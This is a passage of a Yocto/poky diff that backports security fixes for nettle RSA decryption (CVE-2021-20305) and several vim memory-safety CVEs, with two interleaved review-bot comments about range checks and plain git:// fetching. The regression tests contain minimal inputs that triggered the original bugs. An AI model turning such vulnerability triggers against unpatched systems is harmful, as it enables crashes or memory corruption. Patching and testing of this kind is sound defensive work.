mpz_size(pub->n); + + TMP_GMP_ALLOC (m, key_limb_size); +Index: nettle-3.5.1/rsa-decrypt.c +=================================================================== +--- nettle-3.5.1.orig/rsa-decrypt.c ++++ nettle-3.5.1/rsa-decrypt.c +@@ -48,6 +48,16 @@ rsa_decrypt(const struct rsa_private_key + int res; + + mpz_init(m); ++ ++ /* First check that input is in range. Since we don't have the ++ public key available here, we need to reconstruct n. 
*/ ++ mpz_mul (m, key->p, key->q); ++ if (mpz_sgn (gibberish) < 0 || mpz_cmp (gibberish, m) >= 0) ++ { ++ mpz_clear (m); ++ return 0; ++ } ++ + rsa_compute_root(key, m, gibberish); + + res = pkcs1_decrypt (key->size, m, length, message); +Index: nettle-3.5.1/rsa-sec-decrypt.c +=================================================================== +--- nettle-3.5.1.orig/rsa-sec-decrypt.c ++++ nettle-3.5.1/rsa-sec-decrypt.c +@@ -55,6 +55,10 @@ rsa_sec_decrypt(const struct rsa_public_ + TMP_GMP_DECL (em, uint8_t); + int res; + ++ /* First check that input is in range. */ ++ if (mpz_sgn (gibberish) < 0 || mpz_cmp (gibberish, pub->n) >= 0) ++ return 0; ++ + TMP_GMP_ALLOC (m, mpz_size(pub->n)); + TMP_GMP_ALLOC (em, key->size); + +Index: nettle-3.5.1/rsa.h +=================================================================== +--- nettle-3.5.1.orig/rsa.h ++++ nettle-3.5.1/rsa.h +@@ -428,13 +428,14 @@ rsa_sec_decrypt(const struct rsa_public_ + size_t length, uint8_t *message, + const mpz_t gibberish); + +-/* Compute x, the e:th root of m. Calling it with x == m is allowed. */ ++/* Compute x, the e:th root of m. Calling it with x == m is allowed. ++ It is required that 0 <= m < n. */ + void + rsa_compute_root(const struct rsa_private_key *key, + mpz_t x, const mpz_t m); + + /* Safer variant, using RSA blinding, and checking the result after +- CRT. */ ++ CRT. It is required that 0 <= m < n. 
*/ + int + rsa_compute_root_tr(const struct rsa_public_key *pub, + const struct rsa_private_key *key, +Index: nettle-3.5.1/testsuite/rsa-encrypt-test.c +=================================================================== +--- nettle-3.5.1.orig/testsuite/rsa-encrypt-test.c ++++ nettle-3.5.1/testsuite/rsa-encrypt-test.c +@@ -19,11 +19,12 @@ test_main(void) + uint8_t after; + + mpz_t gibberish; +- mpz_t zero; ++ mpz_t bad_input; + + rsa_private_key_init(&key); + rsa_public_key_init(&pub); + mpz_init(gibberish); ++ mpz_init(bad_input); + + knuth_lfib_init(&lfib, 17); + +@@ -103,15 +104,40 @@ test_main(void) + ASSERT(decrypted[0] == 'A'); + + /* Test zero input. */ +- mpz_init_set_ui (zero, 0); ++ mpz_set_ui (bad_input, 0); + decrypted_length = msg_length; +- ASSERT(!rsa_decrypt(&key, &decrypted_length, decrypted, zero)); ++ ASSERT(!rsa_decrypt(&key, &decrypted_length, decrypted, bad_input)); + ASSERT(!rsa_decrypt_tr(&pub, &key, + &lfib, (nettle_random_func *) knuth_lfib_random, +- &decrypted_length, decrypted, zero)); ++ &decrypted_length, decrypted, bad_input)); + ASSERT(!rsa_sec_decrypt(&pub, &key, + &lfib, (nettle_random_func *) knuth_lfib_random, +- decrypted_length, decrypted, zero)); ++ decrypted_length, decrypted, bad_input)); ++ ASSERT(decrypted_length == msg_length); ++ ++ /* Test input that is slightly larger than n */ ++ mpz_add(bad_input, gibberish, pub.n); ++ decrypted_length = msg_length; ++ ASSERT(!rsa_decrypt(&key, &decrypted_length, decrypted, bad_input)); ++ ASSERT(!rsa_decrypt_tr(&pub, &key, ++ &lfib, (nettle_random_func *) knuth_lfib_random, ++ &decrypted_length, decrypted, bad_input)); ++ ASSERT(!rsa_sec_decrypt(&pub, &key, ++ &lfib, (nettle_random_func *) knuth_lfib_random, ++ decrypted_length, decrypted, bad_input)); ++ ASSERT(decrypted_length == msg_length); ++ ++ /* Test input that is considerably larger than n */ ++ mpz_mul_2exp (bad_input, pub.n, 100); ++ mpz_add (bad_input, bad_input, gibberish); ++ decrypted_length = msg_length; ++ 
ASSERT(!rsa_decrypt(&key, &decrypted_length, decrypted, bad_input)); ++ ASSERT(!rsa_decrypt_tr(&pub, &key, ++ &lfib, (nettle_random_func *) knuth_lfib_random, ++ &decrypted_length, decrypted, bad_input)); ++ ASSERT(!rsa_sec_decrypt(&pub, &key, ++ &lfib, (nettle_random_func *) knuth_lfib_random, ++ decrypted_length, decrypted, bad_input)); + ASSERT(decrypted_length == msg_length); + + /* Test invalid key. */ +@@ -124,6 +150,6 @@ test_main(void) + rsa_private_key_clear(&key); + rsa_public_key_clear(&pub); + mpz_clear(gibberish); +- mpz_clear(zero); ++ mpz_clear(bad_input); + free(decrypted); + } diff --git a/poky/meta/recipes-support/nettle/nettle_3.5.1.bb b/poky/meta/recipes-support/nettle/nettle_3.5.1.bb index b2ec24b36c..192fd295e9 100644 --- a/poky/meta/recipes-support/nettle/nettle_3.5.1.bb +++ b/poky/meta/recipes-support/nettle/nettle_3.5.1.bb @@ -18,6 +18,13 @@ SRC_URI = "${GNU_MIRROR}/${BPN}/${BP}.tar.gz \ file://Add-target-to-only-build-tests-not-run-them.patch \ file://run-ptest \ file://check-header-files-of-openssl-only-if-enable_.patch \ + file://CVE-2021-3580_1.patch \ + file://CVE-2021-3580_2.patch \ + file://CVE-2021-20305-1.patch \ + file://CVE-2021-20305-2.patch \ + file://CVE-2021-20305-3.patch \ + file://CVE-2021-20305-4.patch \ + file://CVE-2021-20305-5.patch \ " SRC_URI_append_class-target = "\ diff --git a/poky/meta/recipes-support/p11-kit/p11-kit_0.23.22.bb b/poky/meta/recipes-support/p11-kit/p11-kit_0.23.22.bb index 623afccb5e..5f1b73ee16 100644 --- a/poky/meta/recipes-support/p11-kit/p11-kit_0.23.22.bb +++ b/poky/meta/recipes-support/p11-kit/p11-kit_0.23.22.bb @@ -10,7 +10,7 @@ DEPENDS = "libtasn1 libtasn1-native libffi" DEPENDS_append = "${@' glib-2.0' if d.getVar('GTKDOC_ENABLED') == 'True' else ''}" -SRC_URI = "git://github.com/p11-glue/p11-kit;branch=0.23" +SRC_URI = "git://github.com/p11-glue/p11-kit;branch=0.23;protocol=https" SRCREV = "bd97afbfe28d5fbbde95ce36ff7a8834fc0291ee" S = "${WORKDIR}/git" 
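Review bot: rsa_compute_root_tr still relies on its callers for the range check. The rsa.h hunk only adds "It is required that 0 <= m < n" to its comment, while the actual guards go into rsa_decrypt, rsa_decrypt_tr and rsa_sec_decrypt. In the form the preceding patch gives it, rsa_compute_root_tr passes m straight to `mpz_limbs_copy(l, m, nn)`, and what that helper does with an m wider than nn limbs is not visible on this page. Since the function is declared in rsa.h, the same guard at its top, `if (mpz_sgn (m) < 0 || mpz_cmp (m, pub->n) >= 0) return 0;`, would enforce the documented precondition instead of assuming it. It is also worth adding a test that calls rsa_compute_root_tr directly with an out-of-range value.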
diff --git a/poky/meta/recipes-support/ptest-runner/ptest-runner_2.4.0.bb b/poky/meta/recipes-support/ptest-runner/ptest-runner_2.4.0.bb index 7290dc90e5..3401b7b39e 100644 --- a/poky/meta/recipes-support/ptest-runner/ptest-runner_2.4.0.bb +++ b/poky/meta/recipes-support/ptest-runner/ptest-runner_2.4.0.bb @@ -10,7 +10,7 @@ LIC_FILES_CHKSUM = "file://LICENSE;md5=751419260aa954499f7abaabaa882bbe" SRCREV = "834670317bd3f6e427e1ac461c07ada6b8936dfd" PV .= "+git${SRCPV}" -SRC_URI = "git://git.yoctoproject.org/ptest-runner2 \ +SRC_URI = "git://git.yoctoproject.org/ptest-runner2;branch=master \ " UPSTREAM_VERSION_UNKNOWN = "1" diff --git a/poky/meta/recipes-support/rng-tools/rng-tools/rngd.service b/poky/meta/recipes-support/rng-tools/rng-tools/rngd.service index aaaaa29074..f296a99e1f 100644 --- a/poky/meta/recipes-support/rng-tools/rng-tools/rngd.service +++ b/poky/meta/recipes-support/rng-tools/rng-tools/rngd.service @@ -3,6 +3,7 @@ Description=Hardware RNG Entropy Gatherer Daemon DefaultDependencies=no After=systemd-udev-settle.service Before=sysinit.target shutdown.target +Wants=systemd-udev-settle.service Conflicts=shutdown.target [Service] diff --git a/poky/meta/recipes-support/rng-tools/rng-tools_6.9.bb b/poky/meta/recipes-support/rng-tools/rng-tools_6.9.bb index b8c6f022f3..58b58fbb3c 100644 --- a/poky/meta/recipes-support/rng-tools/rng-tools_6.9.bb +++ b/poky/meta/recipes-support/rng-tools/rng-tools_6.9.bb @@ -9,7 +9,7 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=b234ee4d69f5fce4486a80fdaf4a4263" DEPENDS = "sysfsutils" SRC_URI = "\ - git://github.com/nhorman/rng-tools.git \ + git://github.com/nhorman/rng-tools.git;branch=master;protocol=https \ file://0001-rngd_jitter-fix-O_NONBLOCK-setting-for-entropy-pipe.patch \ file://0002-rngd_jitter-initialize-AES-key-before-setting-the-en.patch \ file://0003-rngd_jitter-always-read-from-entropy-pipe-before-set.patch \ 
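Review bot: The ptest-runner SRC_URI still fetches over plain git://, because this hunk adds only `;branch=master`. The p11-kit and rng-tools hunks in the same commit add `protocol=https`, and shared-mime-info already had it. SRCREV pins the commit, so integrity of the fetch rests on that hash alone over an unauthenticated transport. If git.yoctoproject.org serves this repository over HTTPS, `SRC_URI = "git://git.yoctoproject.org/ptest-runner2;branch=master;protocol=https \` would bring it in line with the other recipes.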
diff --git a/poky/meta/recipes-support/shared-mime-info/shared-mime-info_git.bb b/poky/meta/recipes-support/shared-mime-info/shared-mime-info_git.bb index 6b3ebf1cdc..05c7d32965 100644 --- a/poky/meta/recipes-support/shared-mime-info/shared-mime-info_git.bb +++ b/poky/meta/recipes-support/shared-mime-info/shared-mime-info_git.bb @@ -8,7 +8,7 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=b234ee4d69f5fce4486a80fdaf4a4263" DEPENDS = "libxml2 itstool-native glib-2.0 shared-mime-info-native" -SRC_URI = "git://gitlab.freedesktop.org/xdg/shared-mime-info.git;protocol=https" +SRC_URI = "git://gitlab.freedesktop.org/xdg/shared-mime-info.git;protocol=https;branch=master" SRCREV = "829b26d85e7d89a0caee03046c3bce373f04c80a" PV = "1.15" S = "${WORKDIR}/git" diff --git a/poky/meta/recipes-support/vim/files/0001-patch-8.2.3581-reading-character-past-end-of-line.patch b/poky/meta/recipes-support/vim/files/0001-patch-8.2.3581-reading-character-past-end-of-line.patch new file mode 100644 index 0000000000..28c61cd782 --- /dev/null +++ b/poky/meta/recipes-support/vim/files/0001-patch-8.2.3581-reading-character-past-end-of-line.patch 
@@ -0,0 +1,62 @@ +CVE: CVE-2021-3927 +Upstream-Status: Backport +Signed-off-by: Ross Burton <ross.burton@arm.com> + +From 93b427c6e729260d0700c3b2804ec153bc8284fa Mon Sep 17 00:00:00 2001 +From: Bram Moolenaar <Bram@vim.org> +Date: Thu, 4 Nov 2021 15:10:11 +0000 +Subject: [PATCH] patch 8.2.3581: reading character past end of line + +Problem: Reading character past end of line. +Solution: Correct the cursor column. +--- + src/ex_docmd.c | 1 + + src/testdir/test_put.vim | 12 ++++++++++++ + src/version.c | 2 ++ + 3 files changed, 15 insertions(+) + +diff --git a/src/ex_docmd.c b/src/ex_docmd.c +index fde726477..59e245bee 100644 +--- a/src/ex_docmd.c ++++ b/src/ex_docmd.c +@@ -6905,6 +6905,7 @@ ex_put(exarg_T *eap) + eap->forceit = TRUE; + } + curwin->w_cursor.lnum = eap->line2; ++ check_cursor_col(); + do_put(eap->regname, eap->forceit ? BACKWARD : FORWARD, 1L, + PUT_LINE|PUT_CURSLINE); + } +diff --git a/src/testdir/test_put.vim b/src/testdir/test_put.vim +index 225ebd1f3..922e5b269 100644 +--- a/src/testdir/test_put.vim ++++ b/src/testdir/test_put.vim +@@ -113,3 +113,15 @@ func Test_put_p_indent_visual() + call assert_equal('select that text', getline(2)) + bwipe! + endfunc ++ ++func Test_put_above_first_line() ++ new ++ let @" = 'text' ++ silent! normal 0o00 ++ 0put ++ call assert_equal('text', getline(1)) ++ bwipe! ++endfunc ++ ++ ++" vim: shiftwidth=2 sts=2 expandtab +diff --git a/src/version.c b/src/version.c +index a9e8be0e7..df4ec9a47 100644 +--- a/src/version.c ++++ b/src/version.c +@@ -742,6 +742,8 @@ static char *(features[]) = + + static int included_patches[] = + { /* Add new patch number below this line */ ++/**/ ++ 3581, + /**/ + 3564, + /**/ diff --git a/poky/meta/recipes-support/vim/files/0002-patch-8.2.3428-using-freed-memory-when-replacing.patch b/poky/meta/recipes-support/vim/files/0002-patch-8.2.3428-using-freed-memory-when-replacing.patch new file mode 100644 index 0000000000..ecfae0301e --- /dev/null 
+++ b/poky/meta/recipes-support/vim/files/0002-patch-8.2.3428-using-freed-memory-when-replacing.patch 
@@ -0,0 +1,83 @@ +CVE: CVE-2021-3796 +Upstream-Status: Backport +Signed-off-by: Ross Burton <ross.burton@arm.com> + +From 1160e5f74b229336502fc376416f21108d36cfc2 Mon Sep 17 00:00:00 2001 +From: Bram Moolenaar <Bram@vim.org> +Date: Sat, 11 Sep 2021 21:14:20 +0200 +Subject: [PATCH] patch 8.2.3428: using freed memory when replacing + +Problem: Using freed memory when replacing. (Dhiraj Mishra) +Solution: Get the line pointer after calling ins_copychar(). +--- + src/normal.c | 10 +++++++--- + src/testdir/test_edit.vim | 14 ++++++++++++++ + src/version.c | 2 ++ + 3 files changed, 23 insertions(+), 3 deletions(-) + +diff --git a/src/normal.c b/src/normal.c +index c4963e621..d6333b948 100644 +--- a/src/normal.c ++++ b/src/normal.c +@@ -5009,19 +5009,23 @@ nv_replace(cmdarg_T *cap) + { + /* + * Get ptr again, because u_save and/or showmatch() will have +- * released the line. At the same time we let know that the +- * line will be changed. ++ * released the line. This may also happen in ins_copychar(). ++ * At the same time we let know that the line will be changed. + */ +- ptr = ml_get_buf(curbuf, curwin->w_cursor.lnum, TRUE); + if (cap->nchar == Ctrl_E || cap->nchar == Ctrl_Y) + { + int c = ins_copychar(curwin->w_cursor.lnum + + (cap->nchar == Ctrl_Y ? -1 : 1)); ++ ++ ptr = ml_get_buf(curbuf, curwin->w_cursor.lnum, TRUE); + if (c != NUL) + ptr[curwin->w_cursor.col] = c; + } + else ++ { ++ ptr = ml_get_buf(curbuf, curwin->w_cursor.lnum, TRUE); + ptr[curwin->w_cursor.col] = cap->nchar; ++ } + if (p_sm && msg_silent == 0) + showmatch(cap->nchar); + ++curwin->w_cursor.col; +diff --git a/src/testdir/test_edit.vim b/src/testdir/test_edit.vim +index 4e29e7fe1..f94e6c181 100644 +--- a/src/testdir/test_edit.vim ++++ b/src/testdir/test_edit.vim +@@ -1519,3 +1519,17 @@ func Test_edit_noesckeys() + bwipe! + set esckeys + endfunc ++ ++" Test for getting the character of the line below after "p" ++func Test_edit_put_CTRL_E() ++ set encoding=latin1 ++ new ++ let @" = '' ++ sil! 
norm orggRx ++ sil! norm pr ++ call assert_equal(['r', 'r'], getline(1, 2)) ++ bwipe! ++ set encoding=utf-8 ++endfunc ++ ++" vim: shiftwidth=2 sts=2 expandtab +diff --git a/src/version.c b/src/version.c +index 85bdfc601..1046993d6 100644 +--- a/src/version.c ++++ b/src/version.c +@@ -742,6 +742,8 @@ static char *(features[]) = + + static int included_patches[] = + { /* Add new patch number below this line */ ++/**/ ++ 3428, + /**/ + 3409, + /**/ diff --git a/poky/meta/recipes-support/vim/files/0002-patch-8.2.3582-reading-uninitialized-memory-when-giv.patch b/poky/meta/recipes-support/vim/files/0002-patch-8.2.3582-reading-uninitialized-memory-when-giv.patch new file mode 100644 index 0000000000..d117a98893 --- /dev/null +++ b/poky/meta/recipes-support/vim/files/0002-patch-8.2.3582-reading-uninitialized-memory-when-giv.patch 
@@ -0,0 +1,63 @@ +CVE: CVE-2021-3928 +Upstream-Status: Backport +Signed-off-by: Ross Burton <ross.burton@arm.com> + +From ade0f0481969f1453c60e7c8354b00dfe4238739 Mon Sep 17 00:00:00 2001 +From: Bram Moolenaar <Bram@vim.org> +Date: Thu, 4 Nov 2021 15:46:05 +0000 +Subject: [PATCH] patch 8.2.3582: reading uninitialized memory when giving + spell suggestions + +Problem: Reading uninitialized memory when giving spell suggestions. +Solution: Check that preword is not empty. +--- + src/spellsuggest.c | 2 +- + src/testdir/test_spell.vim | 8 ++++++++ + src/version.c | 2 ++ + 3 files changed, 11 insertions(+), 1 deletion(-) + +diff --git a/src/spellsuggest.c b/src/spellsuggest.c +index 9d6df7930..8615d5280 100644 +--- a/src/spellsuggest.c ++++ b/src/spellsuggest.c +@@ -1600,7 +1600,7 @@ suggest_trie_walk( + // char, e.g., "thes," -> "these". + p = fword + sp->ts_fidx; + MB_PTR_BACK(fword, p); +- if (!spell_iswordp(p, curwin)) ++ if (!spell_iswordp(p, curwin) && *preword != NUL) + { + p = preword + STRLEN(preword); + MB_PTR_BACK(preword, p); +diff --git a/src/testdir/test_spell.vim b/src/testdir/test_spell.vim +index 79fb8927c..e435e9172 100644 +--- a/src/testdir/test_spell.vim ++++ b/src/testdir/test_spell.vim +@@ -498,6 +498,14 @@ func Test_spell_screendump() + call delete('XtestSpell') + endfunc + ++func Test_spell_single_word() ++ new ++ silent! norm 0R00 ++ spell! ß ++ silent 0norm 0r$ Dvz= ++ bwipe! ++endfunc ++ + let g:test_data_aff1 = [ + \"SET ISO8859-1", + \"TRY esianrtolcdugmphbyfvkwjkqxz-\xEB\xE9\xE8\xEA\xEF\xEE\xE4\xE0\xE2\xF6\xFC\xFB'ESIANRTOLCDUGMPHBYFVKWJKQXZ", +diff --git a/src/version.c b/src/version.c +index df4ec9a47..e1bc0d09b 100644 +--- a/src/version.c ++++ b/src/version.c +@@ -742,6 +742,8 @@ static char *(features[]) = + + static int included_patches[] = + { /* Add new patch number below this line */ ++/**/ ++ 3582, + /**/ + 3581, + /**/ 
diff --git a/poky/meta/recipes-support/vim/files/0002-patch-8.2.3611-crash-when-using-CTRL-W-f-without-fin.patch b/poky/meta/recipes-support/vim/files/0002-patch-8.2.3611-crash-when-using-CTRL-W-f-without-fin.patch new file mode 100644 index 0000000000..58d3442677 --- /dev/null +++ b/poky/meta/recipes-support/vim/files/0002-patch-8.2.3611-crash-when-using-CTRL-W-f-without-fin.patch 
@@ -0,0 +1,92 @@ +CVE: CVE-2021-3973 +Upstream-Status: Backport +Signed-off-by: Ross Burton <ross.burton@arm.com> + +From b6154e9f530544ddc3130d981caae0dabc053757 Mon Sep 17 00:00:00 2001 +From: Bram Moolenaar <Bram@vim.org> +Date: Wed, 17 Nov 2021 18:00:31 +0000 +Subject: [PATCH] patch 8.2.3611: crash when using CTRL-W f without finding a + file name Problem: Crash when using CTRL-W f without finding + a file name. Solution: Bail out when the file name length is zero. + +--- + src/findfile.c | 8 ++++++++ + src/normal.c | 6 ++++-- + src/testdir/test_visual.vim | 8 ++++++++ + src/version.c | 2 ++ + 4 files changed, 22 insertions(+), 2 deletions(-) + +diff --git a/src/findfile.c b/src/findfile.c +index dba547da1..5764fd7b8 100644 +--- a/src/findfile.c ++++ b/src/findfile.c +@@ -1727,6 +1727,9 @@ find_file_in_path_option( + proc->pr_WindowPtr = (APTR)-1L; + # endif + ++ if (len == 0) ++ return NULL; ++ + if (first == TRUE) + { + // copy file name into NameBuff, expanding environment variables +@@ -2094,7 +2097,12 @@ find_file_name_in_path( + int c; + # if defined(FEAT_FIND_ID) && defined(FEAT_EVAL) + char_u *tofree = NULL; ++# endif + ++ if (len == 0) ++ return NULL; ++ ++# if defined(FEAT_FIND_ID) && defined(FEAT_EVAL) + if ((options & FNAME_INCL) && *curbuf->b_p_inex != NUL) + { + tofree = eval_includeexpr(ptr, len); +diff --git a/src/normal.c b/src/normal.c +index 7cb959257..f0084f2ac 100644 +--- a/src/normal.c ++++ b/src/normal.c +@@ -3778,8 +3778,10 @@ get_visual_text( + *pp = ml_get_pos(&VIsual); + *lenp = curwin->w_cursor.col - VIsual.col + 1; + } +- if (has_mbyte) +- // Correct the length to include the whole last character. ++ if (**pp == NUL) ++ *lenp = 0; ++ if (has_mbyte && *lenp > 0) ++ // Correct the length to include all bytes of the last character. 
+ *lenp += (*mb_ptr2len)(*pp + (*lenp - 1)) - 1; + } + reset_VIsual_and_resel(); +diff --git a/src/testdir/test_visual.vim b/src/testdir/test_visual.vim +index ae281238e..0705fdb57 100644 +--- a/src/testdir/test_visual.vim ++++ b/src/testdir/test_visual.vim +@@ -894,4 +894,12 @@ func Test_block_insert_replace_tabs() + bwipe! + endfunc + ++func Test_visual_block_ctrl_w_f() ++ " Emtpy block selected in new buffer should not result in an error. ++ au! BufNew foo sil norm f ++ edit foo ++ ++ au! BufNew ++endfunc ++ + " vim: shiftwidth=2 sts=2 expandtab +diff --git a/src/version.c b/src/version.c +index 52be3c39d..59a314b3a 100644 +--- a/src/version.c ++++ b/src/version.c +@@ -742,6 +742,8 @@ static char *(features[]) = + + static int included_patches[] = + { /* Add new patch number below this line */ ++/**/ ++ 3611, + /**/ + 3582, + /**/ diff --git a/poky/meta/recipes-support/vim/files/0003-patch-8.2.3487-illegal-memory-access-if-buffer-name-.patch b/poky/meta/recipes-support/vim/files/0003-patch-8.2.3487-illegal-memory-access-if-buffer-name-.patch new file mode 100644 index 0000000000..576664f436 --- /dev/null +++ b/poky/meta/recipes-support/vim/files/0003-patch-8.2.3487-illegal-memory-access-if-buffer-name-.patch 
@@ -0,0 +1,86 @@ +CVE: CVE-2021-3872 +Upstream-Status: Backport +Signed-off-by: Ross Burton <ross.burton@arm.com> + +From 61629ea24a2fff1f89c37479d3fb52f17c3480fc Mon Sep 17 00:00:00 2001 +From: Bram Moolenaar <Bram@vim.org> +Date: Fri, 8 Oct 2021 18:39:28 +0100 +Subject: [PATCH] patch 8.2.3487: illegal memory access if buffer name is very + long + +Problem: Illegal memory access if buffer name is very long. +Solution: Make sure not to go over the end of the buffer. +--- + src/drawscreen.c | 10 +++++----- + src/testdir/test_statusline.vim | 11 +++++++++++ + src/version.c | 2 ++ + 3 files changed, 18 insertions(+), 5 deletions(-) + +diff --git a/src/drawscreen.c b/src/drawscreen.c +index 3a88ee979..9acb70552 100644 +--- a/src/drawscreen.c ++++ b/src/drawscreen.c +@@ -446,13 +446,13 @@ win_redr_status(win_T *wp, int ignore_pum UNUSED) + *(p + len++) = ' '; + if (bt_help(wp->w_buffer)) + { +- STRCPY(p + len, _("[Help]")); ++ vim_snprintf((char *)p + len, MAXPATHL - len, "%s", _("[Help]")); + len += (int)STRLEN(p + len); + } + #ifdef FEAT_QUICKFIX + if (wp->w_p_pvw) + { +- STRCPY(p + len, _("[Preview]")); ++ vim_snprintf((char *)p + len, MAXPATHL - len, "%s", _("[Preview]")); + len += (int)STRLEN(p + len); + } + #endif +@@ -462,12 +462,12 @@ win_redr_status(win_T *wp, int ignore_pum UNUSED) + #endif + ) + { +- STRCPY(p + len, "[+]"); +- len += 3; ++ vim_snprintf((char *)p + len, MAXPATHL - len, "%s", "[+]"); ++ len += (int)STRLEN(p + len); + } + if (wp->w_buffer->b_p_ro) + { +- STRCPY(p + len, _("[RO]")); ++ vim_snprintf((char *)p + len, MAXPATHL - len, "%s", _("[RO]")); + len += (int)STRLEN(p + len); + } + +diff --git a/src/testdir/test_statusline.vim b/src/testdir/test_statusline.vim +index 1f705b847..91bce1407 100644 +--- a/src/testdir/test_statusline.vim ++++ b/src/testdir/test_statusline.vim +@@ -393,3 +393,14 @@ func Test_statusline_visual() + bwipe! x1 + bwipe! x2 + endfunc ++" Used to write beyond allocated memory. This assumes MAXPATHL is 4096 bytes. 
++func Test_statusline_verylong_filename() ++ let fname = repeat('x', 4090) ++ exe "new " .. fname ++ set buftype=help ++ set previewwindow ++ redraw ++ bwipe! ++endfunc ++ ++" vim: shiftwidth=2 sts=2 expandtab +diff --git a/src/version.c b/src/version.c +index 1046993d6..2b5de5ccf 100644 +--- a/src/version.c ++++ b/src/version.c +@@ -742,6 +742,8 @@ static char *(features[]) = + + static int included_patches[] = + { /* Add new patch number below this line */ ++/**/ ++ 3487, + /**/ + 3428, + /**/ diff --git a/poky/meta/recipes-support/vim/files/0004-patch-8.2.3489-ml_get-error-after-search-with-range.patch b/poky/meta/recipes-support/vim/files/0004-patch-8.2.3489-ml_get-error-after-search-with-range.patch new file mode 100644 index 0000000000..045081579c --- /dev/null +++ b/poky/meta/recipes-support/vim/files/0004-patch-8.2.3489-ml_get-error-after-search-with-range.patch 
@@ -0,0 +1,72 @@ +CVE: CVE-2021-3875 +Upstream-Status: Backport +Signed-off-by: Ross Burton <ross.burton@arm.com> + +From b8968e26d7508e7d64bfc86808142818b0a9288c Mon Sep 17 00:00:00 2001 +From: Bram Moolenaar <Bram@vim.org> +Date: Sat, 9 Oct 2021 13:58:55 +0100 +Subject: [PATCH] patch 8.2.3489: ml_get error after search with range + +Problem: ml_get error after search with range. +Solution: Limit the line number to the buffer line count. +--- + src/ex_docmd.c | 6 ++++-- + src/testdir/test_search.vim | 17 +++++++++++++++++ + src/version.c | 2 ++ + 3 files changed, 23 insertions(+), 2 deletions(-) + +diff --git a/src/ex_docmd.c b/src/ex_docmd.c +index fb07450f8..fde726477 100644 +--- a/src/ex_docmd.c ++++ b/src/ex_docmd.c +@@ -3586,8 +3586,10 @@ get_address( + + // When '/' or '?' follows another address, start from + // there. +- if (lnum != MAXLNUM) +- curwin->w_cursor.lnum = lnum; ++ if (lnum > 0 && lnum != MAXLNUM) ++ curwin->w_cursor.lnum = ++ lnum > curbuf->b_ml.ml_line_count ++ ? curbuf->b_ml.ml_line_count : lnum; + + // Start a forward search at the end of the line (unless + // before the first line). +diff --git a/src/testdir/test_search.vim b/src/testdir/test_search.vim +index 187671305..e142c3547 100644 +--- a/src/testdir/test_search.vim ++++ b/src/testdir/test_search.vim +@@ -1366,3 +1366,20 @@ func Test_searchdecl() + + bwipe! + endfunc ++ ++func Test_search_with_invalid_range() ++ new ++ let lines =<< trim END ++ /\%.v ++ 5/ ++ c ++ END ++ call writefile(lines, 'Xrangesearch') ++ source Xrangesearch ++ ++ bwipe! ++ call delete('Xrangesearch') ++endfunc ++ ++ ++" vim: shiftwidth=2 sts=2 expandtab +diff --git a/src/version.c b/src/version.c +index 2b5de5ccf..092864bbb 100644 +--- a/src/version.c ++++ b/src/version.c +@@ -742,6 +742,8 @@ static char *(features[]) = + + static int included_patches[] = + { /* Add new patch number below this line */ ++/**/ ++ 3489, + /**/ + 3487, + /**/ 
diff --git a/poky/meta/recipes-support/vim/files/0005-patch-8.2.3564-invalid-memory-access-when-scrolling-.patch b/poky/meta/recipes-support/vim/files/0005-patch-8.2.3564-invalid-memory-access-when-scrolling-.patch new file mode 100644 index 0000000000..7184b37cad --- /dev/null +++ b/poky/meta/recipes-support/vim/files/0005-patch-8.2.3564-invalid-memory-access-when-scrolling-.patch 
@@ -0,0 +1,97 @@ +CVE: CVE-2021-3903 +Upstream-Status: Backport +Signed-off-by: Ross Burton <ross.burton@arm.com> + +From b15919c1fe0f7fc3d98ff5207ed2feb43c59009d Mon Sep 17 00:00:00 2001 +From: Bram Moolenaar <Bram@vim.org> +Date: Mon, 25 Oct 2021 17:07:04 +0100 +Subject: [PATCH] patch 8.2.3564: invalid memory access when scrolling without + valid screen + +Problem: Invalid memory access when scrolling without a valid screen. +Solution: Do not set VALID_BOTLINE in w_valid. +--- + src/move.c | 1 - + src/testdir/test_normal.vim | 23 ++++++++++++++++++++--- + src/version.c | 2 ++ + 3 files changed, 22 insertions(+), 4 deletions(-) + +diff --git a/src/move.c b/src/move.c +index 8e53d8bcb..10165ef4d 100644 +--- a/src/move.c ++++ b/src/move.c +@@ -198,7 +198,6 @@ update_topline(void) + { + curwin->w_topline = curwin->w_cursor.lnum; + curwin->w_botline = curwin->w_topline; +- curwin->w_valid |= VALID_BOTLINE|VALID_BOTLINE_AP; + curwin->w_scbind_pos = 1; + return; + } +diff --git a/src/testdir/test_normal.vim b/src/testdir/test_normal.vim +index d45cf4159..ca87928f5 100644 +--- a/src/testdir/test_normal.vim ++++ b/src/testdir/test_normal.vim +@@ -33,14 +33,14 @@ func CountSpaces(type, ...) + else + silent exe "normal! `[v`]y" + endif +- let g:a=strlen(substitute(@@, '[^ ]', '', 'g')) ++ let g:a = strlen(substitute(@@, '[^ ]', '', 'g')) + let &selection = sel_save + let @@ = reg_save + endfunc + + func OpfuncDummy(type, ...) + " for testing operatorfunc +- let g:opt=&linebreak ++ let g:opt = &linebreak + + if a:0 " Invoked from Visual mode, use gv command. + silent exe "normal! gvy" +@@ -51,7 +51,7 @@ func OpfuncDummy(type, ...) + endif + " Create a new dummy window + new +- let g:bufnr=bufnr('%') ++ let g:bufnr = bufnr('%') + endfunc + + fun! Test_normal00_optrans() +@@ -718,6 +718,23 @@ func Test_normal17_z_scroll_hor2() + bw! + endfunc + ++ ++func Test_scroll_in_ex_mode() ++ " This was using invalid memory because w_botline was invalid. 
++ let lines =<< trim END ++ diffsplit ++ norm os00( ++ call writefile(['done'], 'Xdone') ++ qa! ++ END ++ call writefile(lines, 'Xscript') ++ call assert_equal(1, RunVim([], [], '--clean -X -Z -e -s -S Xscript')) ++ call assert_equal(['done'], readfile('Xdone')) ++ ++ call delete('Xscript') ++ call delete('Xdone') ++endfunc ++ + func Test_normal18_z_fold() + " basic tests for foldopen/folddelete + if !has("folding") +diff --git a/src/version.c b/src/version.c +index 092864bbb..a9e8be0e7 100644 +--- a/src/version.c ++++ b/src/version.c +@@ -742,6 +742,8 @@ static char *(features[]) = + + static int included_patches[] = + { /* Add new patch number below this line */ ++/**/ ++ 3564, + /**/ + 3489, + /**/ diff --git a/poky/meta/recipes-support/vim/files/CVE-2021-3778.patch b/poky/meta/recipes-support/vim/files/CVE-2021-3778.patch new file mode 100644 index 0000000000..5fa60f5340 --- /dev/null +++ b/poky/meta/recipes-support/vim/files/CVE-2021-3778.patch 
